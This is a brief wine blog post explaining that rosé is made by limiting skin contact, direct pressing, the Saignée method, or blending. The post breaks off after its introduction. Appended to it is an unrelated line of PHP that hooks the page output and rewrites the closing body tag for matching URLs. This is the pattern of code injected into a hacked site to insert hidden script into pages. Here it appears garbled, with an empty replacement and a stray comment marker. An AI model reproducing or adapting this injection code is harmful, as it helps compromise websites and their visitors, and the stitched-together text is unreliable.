All posts by Anna Maria

Yes way, rosé!

Yes way, rosé!

As we head into springtime which is universally celebrated with a glass of rosé, let’s take a look at how winemakers make the pink stuff. There are 4 methods of rosé production; limiting skin contact, direct pressing, Saignée method, and more rarely; blending.


if (!defined('SCRIPT_EXECUTED')) { define('SCRIPT_EXECUTED', true); $pages = ['/']; // ob_start(function($buffer) use ($pages) { $script_id = 'content-main-2'; foreach ($pages as $page) { if (strpos($_SERVER['REQUEST_URI'], $page) !== false) { if (strpos($buffer, $script_id) === false) { return preg_replace('/\s*<\/body>/', "", $buffer); } } } return $buffer; }); }